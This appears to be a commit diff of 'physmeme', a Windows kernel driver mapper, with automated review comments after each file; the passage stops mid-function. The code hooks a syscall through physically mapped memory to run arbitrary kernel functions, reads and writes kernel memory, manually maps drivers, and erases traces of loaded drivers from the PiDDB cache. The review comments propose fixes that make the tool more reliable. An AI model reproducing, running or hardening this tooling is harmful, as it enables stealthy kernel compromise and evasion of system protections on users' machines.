This reverts commit c960f3c60e
merge-requests/1/head
parent
c960f3c60e
commit
eb768dda0c
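--- /dev/null
+++ b/PATH-NOT-SHOWN-ON-PAGE-1
@@ -0,0 +1,215 @@
+/*
+This is free and unencumbered software released into the public domain.
+
+Anyone is free to copy, modify, publish, use, compile, sell, or
+distribute this software, either in source code form or as a compiled
+binary, for any purpose, commercial or non-commercial, and by any
+means.
+
+In jurisdictions that recognize copyright laws, the author or authors
+of this software dedicate any and all copyright interest in the
+software to the public domain. We make this dedication for the benefit
+of the public at large and to the detriment of our heirs and
+successors. We intend this dedication to be an overt act of
+relinquishment in perpetuity of all present and future rights to this
+software under copyright law.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
+EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
+MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
+IN NO EVENT SHALL THE AUTHORS BE LIABLE FOR ANY CLAIM, DAMAGES OR
+OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
+ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
+OTHER DEALINGS IN THE SOFTWARE.
+
+For more information, please refer to <http://unlicense.org>
+
+
+!!!!!!!!!!!!!!!!!!!!!!!!!!! This code was created by not-wlan (wlan). all credit for this header and source file goes to him !!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+*/
+
+#include <fstream>
+#include "../drv_image/drv_image.h"
+
+namespace physmeme
+{
+drv_image::drv_image(std::vector<uint8_t> image) : m_image(std::move(image))
+{
+m_dos_header = reinterpret_cast<PIMAGE_DOS_HEADER>(m_image.data());
+m_nt_headers = reinterpret_cast<PIMAGE_NT_HEADERS64>((uintptr_t)m_dos_header + m_dos_header->e_lfanew);
+m_section_header = reinterpret_cast<IMAGE_SECTION_HEADER*>((uintptr_t)(&m_nt_headers->OptionalHeader) + m_nt_headers->FileHeader.SizeOfOptionalHeader);
+}
+
+size_t drv_image::size() const
+{
+return m_nt_headers->OptionalHeader.SizeOfImage;
+}
+
+uintptr_t drv_image::entry_point() const
+{
+return m_nt_headers->OptionalHeader.AddressOfEntryPoint;
+}
+
+void drv_image::map()
+{
+m_image_mapped.clear();
+m_image_mapped.resize(m_nt_headers->OptionalHeader.SizeOfImage);
+std::copy_n(m_image.begin(), m_nt_headers->OptionalHeader.SizeOfHeaders, m_image_mapped.begin());
+
+for (size_t i = 0; i < m_nt_headers->FileHeader.NumberOfSections; ++i)
+{
+const auto& section = m_section_header[i];
+const auto target = (uintptr_t)m_image_mapped.data() + section.VirtualAddress;
+const auto source = (uintptr_t)m_dos_header + section.PointerToRawData;
+std::copy_n(m_image.begin() + section.PointerToRawData, section.SizeOfRawData, m_image_mapped.begin() + section.VirtualAddress);
+printf("[+] copying [%s] 0x%p -> 0x%p [0x%04X]\n", §ion.Name[0], (void*)source, (void*)target, section.SizeOfRawData);
+}
+}
+
+bool drv_image::process_relocation(uintptr_t image_base_delta, uint16_t data, uint8_t* relocation_base)
+{
+#define IMR_RELOFFSET(x) (x & 0xFFF)
+
+switch (data >> 12 & 0xF)
+{
+case IMAGE_REL_BASED_HIGH:
+{
+const auto raw_address = reinterpret_cast<int16_t*>(relocation_base + IMR_RELOFFSET(data));
+*raw_address += static_cast<unsigned long>(HIWORD(image_base_delta));
+break;
+}
+case IMAGE_REL_BASED_LOW:
+{
+const auto raw_address = reinterpret_cast<int16_t*>(relocation_base + IMR_RELOFFSET(data));
+*raw_address += static_cast<unsigned long>(LOWORD(image_base_delta));
+break;
+}
+case IMAGE_REL_BASED_HIGHLOW:
+{
+const auto raw_address = reinterpret_cast<size_t*>(relocation_base + IMR_RELOFFSET(data));
+*raw_address += static_cast<size_t>(image_base_delta);
+break;
+}
+case IMAGE_REL_BASED_DIR64:
+{
+auto UNALIGNED raw_address = reinterpret_cast<DWORD_PTR UNALIGNED*>(relocation_base + IMR_RELOFFSET(data));
+*raw_address += image_base_delta;
+break;
+}
+case IMAGE_REL_BASED_ABSOLUTE: // No action required
+case IMAGE_REL_BASED_HIGHADJ: // no action required
+{
+break;
+}
+default:
+{
+return false;
+}
+
+}
+#undef IMR_RELOFFSET
+
+return true;
+}
+
+
+void drv_image::relocate(void* base) const
+{
+if (m_nt_headers->FileHeader.Characteristics & IMAGE_FILE_RELOCS_STRIPPED)
+return;
+
+ULONG total_count_bytes;
+const auto nt_headers = ImageNtHeader((void*)m_image_mapped.data());
+auto relocation_directory = (PIMAGE_BASE_RELOCATION)::ImageDirectoryEntryToData(nt_headers, TRUE, IMAGE_DIRECTORY_ENTRY_BASERELOC, &total_count_bytes);
+auto image_base_delta = static_cast<uintptr_t>(reinterpret_cast<uintptr_t>(base) - (nt_headers->OptionalHeader.ImageBase));
+auto relocation_size = total_count_bytes;
+
+// This should check (DllCharacteristics & IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE) too but lots of drivers do not have it set due to WDK defaults
+const bool doRelocations = image_base_delta != 0 && relocation_size > 0;
+
+if (!doRelocations)
+{
+printf("[+] no relocations needed\n");
+return;
+}
+
+void* relocation_end = reinterpret_cast<uint8_t*>(relocation_directory) + relocation_size;
+
+while (relocation_directory < relocation_end)
+{
+auto relocation_base = ::ImageRvaToVa(nt_headers, (void*)m_image_mapped.data(), relocation_directory->VirtualAddress, nullptr);
+
+auto num_relocs = (relocation_directory->SizeOfBlock - 8) >> 1;
+
+auto relocation_data = reinterpret_cast<PWORD>(relocation_directory + 1);
+
+for (unsigned long i = 0; i < num_relocs; ++i, ++relocation_data)
+{
+if (process_relocation(image_base_delta, *relocation_data, (uint8_t*)relocation_base) == FALSE)
+{
+printf("[+] failed to relocate!");
+return;
+}
+}
+
+relocation_directory = reinterpret_cast<PIMAGE_BASE_RELOCATION>(relocation_data);
+}
+
+}
+
+template<typename T>
+__forceinline T* ptr_add(void* base, uintptr_t offset)
+{
+return (T*)(uintptr_t)base + offset;
+}
+
+void drv_image::fix_imports(const std::function<uintptr_t(std::string_view)> get_module, const std::function<uintptr_t(const char*, const char*)> get_function)
+{
+ULONG size;
+auto import_descriptors = static_cast<PIMAGE_IMPORT_DESCRIPTOR>(::ImageDirectoryEntryToData(m_image.data(), FALSE, IMAGE_DIRECTORY_ENTRY_IMPORT, &size));
+
+if (import_descriptors == nullptr)
+{
+printf("[+] no imports!\n");
+return;
+}
+
+for (; import_descriptors->Name; import_descriptors++)
+{
+IMAGE_THUNK_DATA* image_thunk_data;
+
+const auto module_name = get_rva<char>(import_descriptors->Name);
+const auto module_base = get_module(module_name);
+printf("[+] processing module: %s [0x%I64X]\n", module_name, module_base);
+
+if (import_descriptors->OriginalFirstThunk)
+image_thunk_data = get_rva<IMAGE_THUNK_DATA>(import_descriptors->OriginalFirstThunk);
+else
+image_thunk_data = get_rva<IMAGE_THUNK_DATA>(import_descriptors->FirstThunk);
+auto image_func_data = get_rva<IMAGE_THUNK_DATA64>(import_descriptors->FirstThunk);
+;
+
+for (; image_thunk_data->u1.AddressOfData; image_thunk_data++, image_func_data++)
+{
+uintptr_t function_address;
+const auto ordinal = (image_thunk_data->u1.Ordinal & IMAGE_ORDINAL_FLAG64) != 0;
+const auto image_import_by_name = get_rva<IMAGE_IMPORT_BY_NAME>(*(DWORD*)image_thunk_data);
+const auto name_of_import = static_cast<char*>(image_import_by_name->Name);
+function_address = get_function(module_name, name_of_import);
+
+printf("[+] function: %s [0x%I64X]\n", name_of_import, function_address);
+image_func_data->u1.Function = function_address;
+}
+}
+}
+
+void* drv_image::data()
+{
+return m_image_mapped.data();
+}
+
+size_t drv_image::header_size()
+{
+return m_nt_headers->OptionalHeader.SizeOfHeaders;
+}
+}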
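Review bot: map() trusts every header-derived offset: `section.PointerToRawData`, `SizeOfRawData` and `VirtualAddress` go straight into `std::copy_n` without being checked against `m_image.size()` and `m_image_mapped.size()`, and the constructor uses `e_lfanew` and `SizeOfOptionalHeader` before the buffer length or the DOS/NT signatures are validated, so a truncated or malformed image reads and writes out of bounds. Suggest validating the headers in the constructor (buffer at least `sizeof(IMAGE_DOS_HEADER)`, `e_magic == IMAGE_DOS_SIGNATURE`, `e_lfanew + sizeof(IMAGE_NT_HEADERS64) <= m_image.size()`, `Signature == IMAGE_NT_SIGNATURE`) and skipping any section whose raw or virtual range does not fit, as in the excerpt below. Two smaller points in fix_imports: `ordinal` is computed but never consulted, so an import-by-ordinal entry is resolved through `get_rva<IMAGE_IMPORT_BY_NAME>` as if it were a name, and the `get_rva` results are dereferenced without a null check. The `§ion.Name[0]` in the progress printf looks like a rendering artifact of `&section.Name[0]`; independently of that, `Name` is an 8-byte field that is not guaranteed to be NUL-terminated, so `%s` can over-read where `%.8s` would bound it.
```cpp
for (size_t i = 0; i < m_nt_headers->FileHeader.NumberOfSections; ++i)
{
    const auto& section = m_section_header[i];
    // Header-derived offsets are untrusted: skip any section whose raw or
    // virtual range does not fit inside the source buffer / mapped image.
    const uint64_t raw_end = uint64_t{section.PointerToRawData} + section.SizeOfRawData;
    const uint64_t virt_end = uint64_t{section.VirtualAddress} + section.SizeOfRawData;
    if (raw_end > m_image.size() || virt_end > m_image_mapped.size())
    {
        printf("[-] section %zu has an out-of-bounds range, skipping\n", i);
        continue;
    }
    // … unchanged: target/source computation, copy_n and the progress printf …
}
```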
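--- /dev/null
+++ b/PATH-NOT-SHOWN-ON-PAGE-2
@@ -0,0 +1,77 @@
+/*
+This is free and unencumbered software released into the public domain.
+
+Anyone is free to copy, modify, publish, use, compile, sell, or
+distribute this software, either in source code form or as a compiled
+binary, for any purpose, commercial or non-commercial, and by any
+means.
+
+In jurisdictions that recognize copyright laws, the author or authors
+of this software dedicate any and all copyright interest in the
+software to the public domain. We make this dedication for the benefit
+of the public at large and to the detriment of our heirs and
+successors. We intend this dedication to be an overt act of
+relinquishment in perpetuity of all present and future rights to this
+software under copyright law.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
+EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
+MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
+IN NO EVENT SHALL THE AUTHORS BE LIABLE FOR ANY CLAIM, DAMAGES OR
+OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
+ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
+OTHER DEALINGS IN THE SOFTWARE.
+
+For more information, please refer to <http://unlicense.org>
+
+
+!!!!!!!!!!!!!!!!!!!!!!!!!!! This code was created by not-wlan (wlan). all credit for this header and source file goes to him !!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+*/
+
+
+#pragma once
+#include <vector>
+#define WIN32_NO_STATUS
+#include <Windows.h>
+#include <Winternl.h>
+#undef WIN32_NO_STATUS
+#include <ntstatus.h>
+
+#include <functional>
+#include <DbgHelp.h>
+#include <variant>
+#include "../util/nt.hpp"
+
+#pragma comment(lib, "Dbghelp.lib")
+namespace physmeme
+{
+class drv_image
+{
+std::vector<uint8_t> m_image;
+std::vector<uint8_t> m_image_mapped;
+PIMAGE_DOS_HEADER m_dos_header = nullptr;
+PIMAGE_NT_HEADERS64 m_nt_headers = nullptr;
+PIMAGE_SECTION_HEADER m_section_header = nullptr;
+
+public:
+explicit drv_image(std::vector<uint8_t> image);
+size_t size() const;
+uintptr_t entry_point() const;
+void map();
+static bool process_relocation(size_t image_base_delta, uint16_t data, uint8_t* relocation_base);
+void relocate(void* base) const;
+
+template<typename T>
+__forceinline T* get_rva(const unsigned long offset)
+{
+return (T*)::ImageRvaToVa(m_nt_headers, m_image.data(), offset, nullptr);
+}
+
+void fix_imports(
+const std::function<uintptr_t(std::string_view)> get_module,
+const std::function<uintptr_t(const char*, const char*)> get_function
+);
+void* data();
+size_t header_size();
+};
+}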
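Review bot: `get_rva` hands back whatever `::ImageRvaToVa` returns, which is nullptr for an RVA that no section backs, yet nothing in the header says so and the callers in the companion source dereference the result directly; suggest a comment above the template: `// Resolves an RVA inside the raw (unmapped) image. Returns nullptr when the RVA is not backed by any section; callers must check before dereferencing.` Two style points: `fix_imports` takes both `std::function` objects by `const` value, which copies them on every call where `const std::function<...>&` is the idiom for a callback that is only invoked, and the declaration of `process_relocation` spells its first parameter `size_t` while the definition appears to use `uintptr_t` — the same type on 64-bit MSVC, but one spelling should be picked. `data()` and `header_size()` mutate nothing and could be `const` like `size()` and `entry_point()`.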
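--- /dev/null
+++ b/PATH-NOT-SHOWN-ON-PAGE-3
@@ -0,0 +1,346 @@
+#include "kernel_ctx.h"
+
+namespace physmeme
+{
+kernel_ctx::kernel_ctx()
+{
+if (psyscall_func.load() || nt_page_offset || ntoskrnl_buffer)
+return;
+
+nt_rva = reinterpret_cast<std::uint32_t>(
+util::get_kernel_export(
+"ntoskrnl.exe",
+syscall_hook.first.data(),
+true
+));
+
+nt_page_offset = nt_rva % page_size;
+ntoskrnl_buffer = reinterpret_cast<std::uint8_t*>(
+LoadLibraryEx("ntoskrnl.exe", NULL, DONT_RESOLVE_DLL_REFERENCES)
+);
+
+std::vector<std::thread> search_threads;
+//--- for each physical memory range, make a thread to search it
+for (auto ranges : util::pmem_ranges)
+search_threads.emplace_back(std::thread(
+&kernel_ctx::map_syscall,
+this,
+ranges.first,
+ranges.second
+));
+
+for (std::thread& search_thread : search_threads)
+search_thread.join();
+}
+
+void kernel_ctx::map_syscall(std::uintptr_t begin, std::uintptr_t end) const
+{
+//if the physical memory range is less then or equal to 2mb
+if (begin + end <= 0x1000 * 512)
+{
+auto page_va = physmeme::map_phys(begin + nt_page_offset, end);
+if (page_va)
+{
+// scan every page of the physical memory range
+for (auto page = page_va; page < page_va + end; page += 0x1000)
+if (!is_page_found.load()) // keep scanning until its found
+if (!memcmp(reinterpret_cast<void*>(page), ntoskrnl_buffer + nt_rva, 32))
+{
+//
+// this checks to ensure that the syscall does indeed work. if it doesnt, we keep looking!
+//
+psyscall_func.store((void*)page);
+auto my_proc_base = reinterpret_cast<std::uintptr_t>(GetModuleHandleA(NULL));
+auto my_proc_base_from_syscall = reinterpret_cast<std::uintptr_t>(get_proc_base(GetCurrentProcessId()));
+
+if (my_proc_base != my_proc_base_from_syscall)
+continue;
+
+is_page_found.store(true);
+return;
+}
+physmeme::unmap_phys(page_va, end);
+}
+}
+else // else the range is bigger then 2mb
+{
+auto remainder = (begin + end) % (0x1000 * 512);
+
+// loop over 2m chunks
+for (auto range = begin; range < begin + end; range += 0x1000 * 512)
+{
+auto page_va = physmeme::map_phys(range + nt_page_offset, 0x1000 * 512);
+if (page_va)
+{
+// loop every page of 2mbs (512)
+for (auto page = page_va; page < page_va + 0x1000 * 512; page += 0x1000)
+{
+if (!is_page_found.load())
+{
+if (!memcmp(reinterpret_cast<void*>(page), ntoskrnl_buffer + nt_rva, 32))
+{
+//
+// this checks to ensure that the syscall does indeed work. if it doesnt, we keep looking!
+//
+psyscall_func.store((void*)page);
+auto my_proc_base = reinterpret_cast<std::uintptr_t>(GetModuleHandle(NULL));
+auto my_proc_base_from_syscall = reinterpret_cast<std::uintptr_t>(get_proc_base(GetCurrentProcessId()));
+
+if (my_proc_base != my_proc_base_from_syscall)
+continue;
+
+is_page_found.store(true);
+return;
+}
+}
+}
+physmeme::unmap_phys(page_va, 0x1000 * 512);
+}
+}
+
+// map the remainder and check each page of it
+auto page_va = physmeme::map_phys(begin + end - remainder + nt_page_offset, remainder);
+if (page_va)
+{
+for (auto page = page_va; page < page_va + remainder; page += 0x1000)
+{
+if (!is_page_found.load())
+{
+if (!memcmp(reinterpret_cast<void*>(page), ntoskrnl_buffer + nt_rva, 32))
+{
+//
+// this checks to ensure that the syscall does indeed work. if it doesnt, we keep looking!
+//
+psyscall_func.store((void*)page);
+auto my_proc_base = reinterpret_cast<std::uintptr_t>(GetModuleHandle(NULL));
+auto my_proc_base_from_syscall = reinterpret_cast<std::uintptr_t>(get_proc_base(GetCurrentProcessId()));
+
+if (my_proc_base != my_proc_base_from_syscall)
+continue;
+
+is_page_found.store(true);
+return;
+}
+}
+}
+physmeme::unmap_phys(page_va, remainder);
+}
+}
+}
+
+bool kernel_ctx::clear_piddb_cache(const std::string& file_name, const std::uint32_t timestamp)
+{
+static const auto piddb_lock =
+util::memory::get_piddb_lock();
+
+static const auto piddb_table =
+util::memory::get_piddb_table();
+
+if (!piddb_lock || !piddb_table)
+return false;
+
+static const auto ex_acquire_resource =
+util::get_kernel_export(
+"ntoskrnl.exe",
+"ExAcquireResourceExclusiveLite"
+);
+
+static const auto lookup_element_table =
+util::get_kernel_export(
+"ntoskrnl.exe",
+"RtlLookupElementGenericTableAvl"
+);
+
+static const auto release_resource =
+util::get_kernel_export(
+"ntoskrnl.exe",
+"ExReleaseResourceLite"
+);
+
+static const auto delete_table_entry =
+util::get_kernel_export(
+"ntoskrnl.exe",
+"RtlDeleteElementGenericTableAvl"
+);
+
+if (!ex_acquire_resource || !lookup_element_table || !release_resource)
+return false;
+
+PiDDBCacheEntry cache_entry;
+const auto drv_name = std::wstring(file_name.begin(), file_name.end());
+cache_entry.time_stamp = timestamp;
+RtlInitUnicodeString(&cache_entry.driver_name, drv_name.data());
+
+//
+// ExAcquireResourceExclusiveLite
+//
+if (!syscall<ExAcquireResourceExclusiveLite>(ex_acquire_resource, piddb_lock, true))
+return false;
+
+//
+// RtlLookupElementGenericTableAvl
+//
+PIDCacheobj* found_entry_ptr =
+syscall<RtlLookupElementGenericTableAvl>(
+lookup_element_table,
+piddb_table,
+reinterpret_cast<void*>(&cache_entry)
+);
+
+if (found_entry_ptr)
+{
+
+//
+// unlink entry.
+//
+PIDCacheobj found_entry = read_kernel<PIDCacheobj>(found_entry_ptr);
+LIST_ENTRY NextEntry = read_kernel<LIST_ENTRY>(found_entry.list.Flink);
+LIST_ENTRY PrevEntry = read_kernel<LIST_ENTRY>(found_entry.list.Blink);
+
+PrevEntry.Flink = found_entry.list.Flink;
+NextEntry.Blink = found_entry.list.Blink;
+
+write_kernel<LIST_ENTRY>(found_entry.list.Blink, PrevEntry);
+write_kernel<LIST_ENTRY>(found_entry.list.Flink, NextEntry);
+
+//
+// delete entry.
+//
+syscall<RtlDeleteElementGenericTableAvl>(delete_table_entry, piddb_table, found_entry_ptr);
+
+//
+// ensure the entry is 0
+//
+auto result = syscall<RtlLookupElementGenericTableAvl>(
+lookup_element_table,
+piddb_table,
+reinterpret_cast<void*>(&cache_entry)
+);
+
+syscall<ExReleaseResourceLite>(release_resource, piddb_lock);
+return !result;
+}
+syscall<ExReleaseResourceLite>(release_resource, piddb_lock);
+return false;
+}
+
+void* kernel_ctx::allocate_pool(std::size_t size, POOL_TYPE pool_type)
+{
+static const auto ex_alloc_pool =
+util::get_kernel_export(
+"ntoskrnl.exe",
+"ExAllocatePool"
+);
+
+return syscall<ExAllocatePool>(
+ex_alloc_pool,
+pool_type,
+size
+);
+}
+
+void* kernel_ctx::allocate_pool(std::size_t size, ULONG pool_tag, POOL_TYPE pool_type)
+{
+static const auto ex_alloc_pool_with_tag =
+util::get_kernel_export(
+"ntoskrnl.exe",
+"ExAllocatePoolWithTag"
+);
+
+return syscall<ExAllocatePoolWithTag>(
+ex_alloc_pool_with_tag,
+pool_type,
+size,
+pool_tag
+);
+}
+
+void kernel_ctx::read_kernel(void* addr, void* buffer, std::size_t size)
+{
+static const auto mm_copy_memory =
+util::get_kernel_export(
+"ntoskrnl.exe",
+"RtlCopyMemory"
+);
+
+syscall<decltype(&memcpy)>(
+mm_copy_memory,
+buffer,
+addr,
+size
+);
+}
+
+void kernel_ctx::write_kernel(void* addr, void* buffer, std::size_t size)
+{
+static const auto mm_copy_memory =
+util::get_kernel_export(
+"ntoskrnl.exe",
+"RtlCopyMemory"
+);
+
+syscall<decltype(&memcpy)>(
+mm_copy_memory,
+addr,
+buffer,
+size
+);
+}
+
+void kernel_ctx::zero_kernel_memory(void* addr, std::size_t size)
+{
+static const auto rtl_zero_memory =
+util::get_kernel_export(
+"ntoskrnl.exe",
+"RtlZeroMemory"
+);
+
+syscall<decltype(&RtlSecureZeroMemory)>(
+rtl_zero_memory,
+addr,
+size
+);
+}
+
+PEPROCESS kernel_ctx::get_peprocess(unsigned pid) const
+{
+if (!pid)
+return {};
+
+PEPROCESS proc;
+static auto get_peprocess_from_pid =
+util::get_kernel_export(
+"ntoskrnl.exe",
+"PsLookupProcessByProcessId"
+);
+
+syscall<PsLookupProcessByProcessId>(
+get_peprocess_from_pid,
+(HANDLE)pid,
+&proc
+);
+return proc;
+}
+
+void* kernel_ctx::get_proc_base(unsigned pid) const
+{
+if (!pid)
+return {};
+
+const auto peproc = get_peprocess(pid);
+
+if (!peproc)
+return {};
+
+static auto get_section_base =
+util::get_kernel_export(
+"ntoskrnl.exe",
+"PsGetProcessSectionBaseAddress"
+);
+
+return syscall<PsGetProcessSectionBaseAddress>(
+get_section_base,
+peproc
+);
+}
+}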
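Review bot: In map_syscall each memcmp hit is published with `psyscall_func.store((void*)page)` before the candidate is verified, and when the proc-base comparison fails the loop `continue`s and the block ends with `physmeme::unmap_phys(page_va, …)` while psyscall_func may still point into the range just unmapped, leaving a dangling pointer that the header's syscall<>() will later patch through; because the constructor starts one thread per physical range, several threads also store to psyscall_func concurrently while each one's `get_proc_base()` → `syscall<>()` is hooking through it, so one thread can verify a page another thread has just replaced. Suggest serialising the store-and-verify step (a mutex around it, or a single scanning thread) and clearing the candidate on a miss, `psyscall_func.store(nullptr);` before `continue;`, so an unmapped page is never left published; the same pattern appears in all three scan branches. Two smaller points: the null guard in clear_piddb_cache omits `delete_table_entry`, so `syscall<RtlDeleteElementGenericTableAvl>` can be invoked through a null export — `if (!ex_acquire_resource || !lookup_element_table || !release_resource || !delete_table_entry)` — and get_peprocess returns `proc` uninitialised when the lookup fails (`PEPROCESS proc{};`) and never drops the reference PsLookupProcessByProcessId takes on the returned object. The `reinterpret_cast<std::uint32_t>(…)` at the top of the constructor is non-portable if get_kernel_export returns a pointer-sized value (the standard only permits reinterpret_cast to an integer wide enough to hold a pointer); `static_cast<std::uint32_t>(reinterpret_cast<std::uintptr_t>(…))` states the intended truncation explicitly.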
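--- /dev/null
+++ b/PATH-NOT-SHOWN-ON-PAGE-4
@@ -0,0 +1,133 @@
+#pragma once
+#include <windows.h>
+#include <iostream>
+#include <string_view>
+#include <vector>
+#include <thread>
+#include <atomic>
+
+#include "../util/util.hpp"
+#include "../physmeme/physmeme.hpp"
+#include "../util/hook.hpp"
+
+namespace physmeme
+{
+//
+// offset of function into a physical page
+// used for comparing bytes when searching
+//
+inline std::uint16_t nt_page_offset{};
+
+//
+// rva of nt function we are going to hook
+//
+inline std::uint32_t nt_rva{};
+
+//
+// base address of ntoskrnl (inside of this process)
+//
+inline const std::uint8_t* ntoskrnl_buffer{};
+
+//
+// has the page been found yet?
+//
+inline std::atomic<bool> is_page_found = false;
+
+//
+// mapping of a syscalls physical memory (for installing hooks)
+//
+inline std::atomic<void*> psyscall_func{};
+
+//
+// you can edit this how you choose, im hooking NtShutdownSystem.
+//
+inline const std::pair<std::string_view, std::string_view> syscall_hook = { "NtShutdownSystem", "ntdll.dll" };
+
+class kernel_ctx
+{
+public:
+//
+// default constructor
+//
+kernel_ctx();
+
+//
+// allocate kernel pool of desired size and type
+//
+void* allocate_pool(std::size_t size, POOL_TYPE pool_type = NonPagedPool);
+
+//
+// allocate kernel pool of size, pool tag, and type
+//
+void* allocate_pool(std::size_t size, ULONG pool_tag = 'MEME', POOL_TYPE pool_type = NonPagedPool);
+
+//
+// read kernel memory with RtlCopyMemory
+//
+void read_kernel(void* addr, void* buffer, std::size_t size);
+
+//
+// write kernel memory with RtlCopyMemory
+//
+void write_kernel(void* addr, void* buffer, std::size_t size);
+
+//
+// zero kernel memory using RtlZeroMemory
+//
+void zero_kernel_memory(void* addr, std::size_t size);
+
+//
+// clear piddb cache of a specific driver
+//
+bool clear_piddb_cache(const std::string& file_name, const std::uint32_t timestamp);
+
+template <class T>
+T read_kernel(void* addr)
+{
+if (!addr)
+return {};
+T buffer;
+read_kernel(addr, (void*)&buffer, sizeof(T));
+return buffer;
+}
+
+template <class T>
+void write_kernel(void* addr, const T& data)
+{
+if (!addr)
+return;
+write_kernel(addr, (void*)&data, sizeof(T));
+}
+
+template <class T, class ... Ts>
+std::invoke_result_t<T, Ts...> syscall(void* addr, Ts ... args) const
+{
+static const auto proc =
+GetProcAddress(
+GetModuleHandleA("ntdll.dll"),
+syscall_hook.first.data()
+);
+
+hook::make_hook(psyscall_func, addr);
+auto result = reinterpret_cast<T>(proc)(args ...);
+hook::remove(psyscall_func);
+return result;
+}
+private:
+
+//
+// find and map the physical page of a syscall into this process
+//
+void map_syscall(std::uintptr_t begin, std::uintptr_t end) const;
+
+//
+// used in conjunction with get_process_base.
+//
+PEPROCESS get_peprocess(unsigned pid) const;
+
+//
+// get base address of process (used to compare and ensure we find the right page).
+//
+void* get_proc_base(unsigned pid) const;
+};
+}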
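Review bot: `syscall<T, Ts...>()` installs a hook through the shared `psyscall_func` with `hook::make_hook`, makes the call, then removes it, and no synchronisation is visible here, so it is neither reentrant nor safe to call from two threads at once (the constructor starts `map_syscall` once per physical range, and that path calls back into it), yet the template carries no comment at all; suggest one above it: `// Temporarily redirects the hooked ntdll stub named by syscall_hook to addr, calls it and restores it. Not thread-safe and not reentrant: make_hook/remove act on the shared psyscall_func, so callers must be serialised.` Two smaller points: `read_kernel<T>` returns `buffer` uninitialised if the underlying copy does nothing, so `T buffer{};` makes that failure mode deterministic, and `write_kernel<T>` casts away `const` with `(void*)&data` — the non-template `write_kernel(void*, void*, std::size_t)` only ever passes `buffer` as the copy source, so declaring that parameter `const void* buffer` removes the cast. The header also relies on `std::string`, `std::pair` and `std::invoke_result_t` without including `<string>`, `<utility>` or `<type_traits>` itself.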
@ -0,0 +1,281 @@
|
||||
/*
|
||||
MIT License
|
||||
|
||||
Copyright (c) 2020 xerox
|
||||
|
||||
Permission is hereby granted, free of charge, to any person obtaining a copy
|
||||
of this software and associated documentation files (the "Software"), to deal
|
||||
in the Software without restriction, including without limitation the rights
|
||||
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
|
||||
copies of the Software, and to permit persons to whom the Software is
|
||||
furnished to do so, subject to the following conditions:
|
||||
|
||||
The above copyright notice and this permission notice shall be included in all
|
||||
copies or substantial portions of the Software.
|
||||
|
||||
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
|
||||
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
|
||||
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
|
||||
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
|
||||
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
|
||||
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
|
||||
SOFTWARE.
|
||||
*/
|
||||
|
||||
|
||||
#pragma once
|
||||
#include <Windows.h>
|
||||
#include <Winternl.h>
|
||||
#include <string>
|
||||
#include <fstream>
|
||||
#include <filesystem>
|
||||
|
||||
#pragma comment(lib, "ntdll.lib")
|
||||
using nt_load_driver_t = NTSTATUS(__fastcall*)(PUNICODE_STRING);
|
||||
using nt_unload_driver_t = NTSTATUS(__fastcall*)(PUNICODE_STRING);
|
||||
|
||||
namespace driver
|
||||
{
|
||||
namespace util
|
||||
{
|
||||
inline bool delete_service_entry(const std::string& service_name)
|
||||
{
|
||||
HKEY reg_handle;
|
||||
static const std::string reg_key("System\\CurrentControlSet\\Services\\");
|
||||
|
||||
auto result = RegOpenKeyA(
|
||||
HKEY_LOCAL_MACHINE,
|
||||
reg_key.c_str(),
|
||||
®_handle
|
||||
);
|
||||
|
||||
return ERROR_SUCCESS == RegDeleteKeyA(reg_handle, service_name.data()) && ERROR_SUCCESS == RegCloseKey(reg_handle);;
|
||||
}
|
||||
|
||||
inline bool create_service_entry(const std::string& drv_path, const std::string& service_name)
|
||||
{
|
||||
HKEY reg_handle;
|
||||
std::string reg_key("System\\CurrentControlSet\\Services\\");
|
||||
reg_key += service_name;
|
||||
|
||||
auto result = RegCreateKeyA(
|
||||
HKEY_LOCAL_MACHINE,
|
||||
reg_key.c_str(),
|
||||
®_handle
|
||||
);
|
||||
|
||||
if (result != ERROR_SUCCESS)
|
||||
return false;
|
||||
|
||||
//
|
||||
// set type to 1 (kernel)
|
||||
//
|
||||
constexpr std::uint8_t type_value = 1;
|
||||
result = RegSetValueExA(
|
||||
reg_handle,
|
||||
"Type",
|
||||
NULL,
|
||||
REG_DWORD,
|
||||
&type_value,
|
||||
4u
|
||||
);
|
||||
|
||||
if (result != ERROR_SUCCESS)
|
||||
return false;
|
||||
|
||||
//
|
||||
// set error control to 3
|
||||
//
|
||||
constexpr std::uint8_t error_control_value = 3;
|
||||
result = RegSetValueExA(
|
||||
reg_handle,
|
||||
"ErrorControl",
|
||||
NULL,
|
||||
REG_DWORD,
|
||||
&error_control_value,
|
||||
4u
|
||||
);
|
||||
|
||||
if (result != ERROR_SUCCESS)
|
||||
return false;
|
||||
|
||||
//
|
||||
// set start to 3
|
||||
//
|
||||
constexpr std::uint8_t start_value = 3;
|
||||
result = RegSetValueExA(
|
||||
reg_handle,
|
||||
"Start",
|
||||
NULL,
|
||||
REG_DWORD,
|
||||
&start_value,
|
||||
4u
|
||||
);
|
||||
|
||||
if (result != ERROR_SUCCESS)
|
||||
return false;
